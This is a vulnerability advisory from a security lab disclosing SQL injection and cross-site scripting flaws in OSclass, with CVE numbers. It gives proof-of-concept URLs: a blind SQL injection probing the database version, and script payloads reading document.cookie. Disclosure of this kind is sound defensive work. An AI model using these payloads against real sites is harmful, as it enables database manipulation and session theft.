High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OSclass, which can be exploited to perform cross-site scripting and sql injection attacks.
SQL Injection in OSclass: CVE-2012-0973.
Input passed via the “sCategory” GET parameter to /index.php is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID% 28version%28%29,1,1%29%29=5%29%20d%20–%202
Successful exploitation of the vulnerability requires that “magic_quotes_gpc” is off.
Cross-Site Scripting in OSclass: CVE-2012-0974.
Input passed via the “sCity”, “sPattern”, “sPriceMax”, “sPriceMin” GET parameters to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document .cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E